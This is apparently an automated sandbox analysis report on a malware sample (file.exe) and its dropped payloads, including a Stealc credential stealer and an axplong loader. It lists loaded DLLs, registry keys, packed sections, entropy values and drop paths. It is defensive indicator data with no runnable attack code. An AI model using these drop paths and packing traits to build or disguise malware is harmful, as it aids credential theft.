Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Section loaded: ondemandconnroutehelper.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1920512 > 1048576

Source: file.exe

Static PE information: Raw size of keanncem is bigger than: 0x100000 < 0x1a3200

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.6.dr
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 00000006.00000002.2675137486.000000006C18F000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: my_library.pdbU source: f6f4816752.exe, 00000031.00000003.3036164555.0000000004C2B000.00000004.00001000.00020000.00000000.sdmp, f6f4816752.exe, 00000031.00000002.3149193410.000000000031C000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: my_library.pdb source: f6f4816752.exe, 00000031.00000003.3036164555.0000000004C2B000.00000004.00001000.00020000.00000000.sdmp, f6f4816752.exe, 00000031.00000002.3149193410.000000000031C000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 00000006.00000002.2675137486.000000006C18F000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.6.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.cd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;keanncem:EW;dteokgfa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;keanncem:EW;dteokgfa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 1.2.axplong.exe.840000.0.unpack :EW;.rsrc:W;.idata :W; :EW;keanncem:EW;dteokgfa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;keanncem:EW;dteokgfa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Unpacked PE file: 49.2.f6f4816752.exe.2f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;dcpywpmo:EW;ghlarfhj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;dcpywpmo:EW;ghlarfhj:EW;.taggant:EW;

.NET source code contains potential unpacker

Source: 29.2.dac4554719.exe.12831a78.1.raw.unpack, searchX64LPVOIDhierarchy.cs	.Net Code: WaitDelegatesetLatencyMode
Source: 29.0.dac4554719.exe.5e408e.1.raw.unpack, searchX64LPVOIDhierarchy.cs	.Net Code: WaitDelegatesetLatencyMode

Source: random[1].exe.5.dr

Static PE information: 0x9C4597AB [Wed Jan 29 23:35:07 2053 UTC]

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_00F29860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_00F29860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe1.5.dr	Static PE information: real checksum: 0x215252 should be: 0x21306d
Source: RDX123456[1].exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x5876f
Source: stealc_default2.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x516aa
Source: Application.exe.29.dr	Static PE information: real checksum: 0x0 should be: 0x86b26
Source: GOLD1234[1].exe.5.dr	Static PE information: real checksum: 0x0 should be: 0xacdea
Source: RDX123456.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x5876f
Source: random[2].exe.5.dr	Static PE information: real checksum: 0x2d5f17 should be: 0x2d1b47
Source: 1bd0484d71.exe.5.dr	Static PE information: real checksum: 0x2d5f17 should be: 0x2d1b47
Source: random[1].exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x86b26
Source: shop.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0xa36fe
Source: XLN9V631J4Y45UE4.exe.27.dr	Static PE information: real checksum: 0x1d8d5d should be: 0x1d1ab0
Source: c1a4d3220c.exe.5.dr	Static PE information: real checksum: 0x2d80f0 should be: 0x2e27f0
Source: shop[1].exe.5.dr	Static PE information: real checksum: 0x0 should be: 0xa36fe
Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1d86c2 should be: 0x1de36c
Source: f6f4816752.exe.5.dr	Static PE information: real checksum: 0x215252 should be: 0x21306d
Source: POSMOJBFP9W4F4JKM6CCW190HW6F0P.exe.27.dr	Static PE information: real checksum: 0x2b2e4b should be: 0x2ac679
Source: stealc_default2[1].exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x516aa
Source: file.exe	Static PE information: real checksum: 0x1d86c2 should be: 0x1de36c
Source: dac4554719.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x86b26
Source: GOLD1234.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0xacdea
Source: random[1].exe0.5.dr	Static PE information: real checksum: 0x2d80f0 should be: 0x2e27f0

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: keanncem
Source: file.exe	Static PE information: section name: dteokgfa
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: keanncem
Source: axplong.exe.0.dr	Static PE information: section name: dteokgfa
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: random[2].exe.5.dr	Static PE information: section name:
Source: random[2].exe.5.dr	Static PE information: section name: .idata
Source: random[2].exe.5.dr	Static PE information: section name: rdpqavxy
Source: random[2].exe.5.dr	Static PE information: section name: vlmkkwpy
Source: random[2].exe.5.dr	Static PE information: section name: .taggant
Source: 1bd0484d71.exe.5.dr	Static PE information: section name:
Source: 1bd0484d71.exe.5.dr	Static PE information: section name: .idata
Source: 1bd0484d71.exe.5.dr	Static PE information: section name: rdpqavxy
Source: 1bd0484d71.exe.5.dr	Static PE information: section name: vlmkkwpy
Source: 1bd0484d71.exe.5.dr	Static PE information: section name: .taggant
Source: Offnewhere[1].exe.5.dr	Static PE information: section name: .eh_fram
Source: Offnewhere.exe.5.dr	Static PE information: section name: .eh_fram
Source: new_v8[1].exe.5.dr	Static PE information: section name: .vmp+
Source: new_v8[1].exe.5.dr	Static PE information: section name: .vmp+
Source: new_v8[1].exe.5.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.5.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.5.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.5.dr	Static PE information: section name: .vmp+
Source: random[1].exe0.5.dr	Static PE information: section name:
Source: random[1].exe0.5.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.5.dr	Static PE information: section name: .idata
Source: random[1].exe0.5.dr	Static PE information: section name: rqvxxcuy
Source: random[1].exe0.5.dr	Static PE information: section name: yqyviqkw
Source: random[1].exe0.5.dr	Static PE information: section name: .taggant
Source: c1a4d3220c.exe.5.dr	Static PE information: section name:
Source: c1a4d3220c.exe.5.dr	Static PE information: section name: .rsrc
Source: c1a4d3220c.exe.5.dr	Static PE information: section name: .idata
Source: c1a4d3220c.exe.5.dr	Static PE information: section name: rqvxxcuy
Source: c1a4d3220c.exe.5.dr	Static PE information: section name: yqyviqkw
Source: c1a4d3220c.exe.5.dr	Static PE information: section name: .taggant
Source: GOLD1234[1].exe.5.dr	Static PE information: section name: .00cfg
Source: GOLD1234[1].exe.5.dr	Static PE information: section name: .call
Source: GOLD1234.exe.5.dr	Static PE information: section name: .00cfg
Source: GOLD1234.exe.5.dr	Static PE information: section name: .call
Source: random[1].exe1.5.dr	Static PE information: section name:
Source: random[1].exe1.5.dr	Static PE information: section name: .rsrc
Source: random[1].exe1.5.dr	Static PE information: section name: .idata
Source: random[1].exe1.5.dr	Static PE information: section name:
Source: random[1].exe1.5.dr	Static PE information: section name: dcpywpmo
Source: random[1].exe1.5.dr	Static PE information: section name: ghlarfhj
Source: random[1].exe1.5.dr	Static PE information: section name: .taggant
Source: f6f4816752.exe.5.dr	Static PE information: section name:
Source: f6f4816752.exe.5.dr	Static PE information: section name: .rsrc
Source: f6f4816752.exe.5.dr	Static PE information: section name: .idata
Source: f6f4816752.exe.5.dr	Static PE information: section name:
Source: f6f4816752.exe.5.dr	Static PE information: section name: dcpywpmo
Source: f6f4816752.exe.5.dr	Static PE information: section name: ghlarfhj
Source: f6f4816752.exe.5.dr	Static PE information: section name: .taggant
Source: shop[1].exe.5.dr	Static PE information: section name: .00cfg
Source: shop.exe.5.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.6.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.6.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.6.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.6.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.6.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.6.dr	Static PE information: section name: .didat
Source: nss3.dll.6.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.6.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.6.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.6.dr	Static PE information: section name: .00cfg
Source: POSMOJBFP9W4F4JKM6CCW190HW6F0P.exe.27.dr	Static PE information: section name:
Source: POSMOJBFP9W4F4JKM6CCW190HW6F0P.exe.27.dr	Static PE information: section name: .idata
Source: POSMOJBFP9W4F4JKM6CCW190HW6F0P.exe.27.dr	Static PE information: section name: ziejvuqc
Source: POSMOJBFP9W4F4JKM6CCW190HW6F0P.exe.27.dr	Static PE information: section name: vpkhfhix
Source: POSMOJBFP9W4F4JKM6CCW190HW6F0P.exe.27.dr	Static PE information: section name: .taggant
Source: XLN9V631J4Y45UE4.exe.27.dr	Static PE information: section name:
Source: XLN9V631J4Y45UE4.exe.27.dr	Static PE information: section name: .idata
Source: XLN9V631J4Y45UE4.exe.27.dr	Static PE information: section name:
Source: XLN9V631J4Y45UE4.exe.27.dr	Static PE information: section name: npluczcb
Source: XLN9V631J4Y45UE4.exe.27.dr	Static PE information: section name: cveucipf
Source: XLN9V631J4Y45UE4.exe.27.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F2B035 push ecx; ret	6_2_00F2B048
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF8B536 push ecx; ret	6_2_6BF8B549
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123D82A push ebx; ret	27_3_0123D879
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123D82A push ebx; ret	27_3_0123D879
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123D82A push ebx; ret	27_3_0123D879
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123D82A push ebx; ret	27_3_0123D879
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123C230 push ss; retf	27_3_0123C239
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123C230 push ss; retf	27_3_0123C239
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FE16 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FE16 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FE16 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FE16 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FF70 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FF70 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FF70 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FF70 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123D82A push ebx; ret	27_3_0123D879
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123D82A push ebx; ret	27_3_0123D879
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123D82A push ebx; ret	27_3_0123D879
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123D82A push ebx; ret	27_3_0123D879
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123C230 push ss; retf	27_3_0123C239
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123C230 push ss; retf	27_3_0123C239
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FE16 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FE16 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FE16 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FE16 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FF70 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FF70 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FF70 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0123FF70 push eax; iretd	27_3_0123FF73
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Code function: 27_3_0124C7AA push 0000003Bh; retf	27_3_0124C7AC

Source: file.exe	Static PE information: section name: entropy: 7.980336240605662
Source: file.exe	Static PE information: section name: keanncem entropy: 7.953870003541859
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.980336240605662
Source: axplong.exe.0.dr	Static PE information: section name: keanncem entropy: 7.953870003541859
Source: random[2].exe.5.dr	Static PE information: section name: entropy: 7.981028282456901
Source: 1bd0484d71.exe.5.dr	Static PE information: section name: entropy: 7.981028282456901
Source: random[1].exe.5.dr	Static PE information: section name: .text entropy: 7.82060659626259
Source: dac4554719.exe.5.dr	Static PE information: section name: .text entropy: 7.82060659626259
Source: random[1].exe0.5.dr	Static PE information: section name: entropy: 7.978125552990028
Source: c1a4d3220c.exe.5.dr	Static PE information: section name: entropy: 7.978125552990028
Source: GOLD1234[1].exe.5.dr	Static PE information: section name: .text entropy: 7.010787961155337
Source: GOLD1234.exe.5.dr	Static PE information: section name: .text entropy: 7.010787961155337
Source: random[1].exe1.5.dr	Static PE information: section name: dcpywpmo entropy: 7.953610135953472
Source: f6f4816752.exe.5.dr	Static PE information: section name: dcpywpmo entropy: 7.953610135953472
Source: shop[1].exe.5.dr	Static PE information: section name: .text entropy: 7.0240622903518135
Source: shop.exe.5.dr	Static PE information: section name: .text entropy: 7.0240622903518135
Source: POSMOJBFP9W4F4JKM6CCW190HW6F0P.exe.27.dr	Static PE information: section name: entropy: 7.801926370917028
Source: XLN9V631J4Y45UE4.exe.27.dr	Static PE information: section name: entropy: 7.983780159268144
Source: XLN9V631J4Y45UE4.exe.27.dr	Static PE information: section name: npluczcb entropy: 7.953091087271067
Source: Application.exe.29.dr	Static PE information: section name: .text entropy: 7.82060659626259

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	File created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stealc_default2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RDX123456[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\0b44ippu[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	File created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File created: C:\Users\user\AppData\Local\Temp\XLN9V631J4Y45UE4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\GOLD1234[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Offnewhere[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001507001\1bd0484d71.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File created: C:\Users\user\AppData\Local\Temp\ZWAE2K096DYFL3DZL5I.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	File created: C:\ProgramData\LgAmARwZ\Application.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\shop[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
